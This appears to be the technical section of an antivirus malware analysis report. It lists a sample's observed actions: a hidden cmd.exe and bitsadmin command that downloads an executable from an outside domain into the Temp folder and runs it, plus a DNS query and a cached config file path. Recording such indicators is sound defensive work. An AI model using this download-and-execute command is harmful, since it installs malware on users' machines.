Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer /download "http://cloudsfullversionooficcekey.com/J4v4S3tups00.exe" "%LOCALAPPDATA%\Temp/ASdkiao.exe" && "%LOCALAPPDATA%\Temp/ASdkiao.exe"
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK cl#######lversionooficcekey.com
- '<SYSTEM32>\bitsadmin.exe' /transfer /download "http://cloudsfullversionooficcekey.com/J4v4S3tups00.exe" "%LOCALAPPDATA%\Temp/ASdkiao.exe"
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer /download "http://cloudsfullversionooficcekey.com/J4v4S3tups00.exe" "%LOCALAPPDATA%\Temp/ASdkiao.exe" && "%LOCALAPPDATA%\Temp/ASdkiao.exe" (со скрытым окном)